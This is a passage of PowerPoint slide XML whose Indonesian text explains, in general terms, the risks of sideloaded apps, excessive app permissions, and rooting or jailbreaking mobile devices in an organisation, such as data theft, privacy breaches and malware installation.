            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>samping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeriksaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeriksaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di toko </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>resmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memudahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpotensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencurian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlebihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlebihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panggilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Rooting, sideload, dan jailbreak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fleksibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Rooting, sideload, dan jailbreak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melemahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produsen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memudahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> toko </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>resmi</a:t>
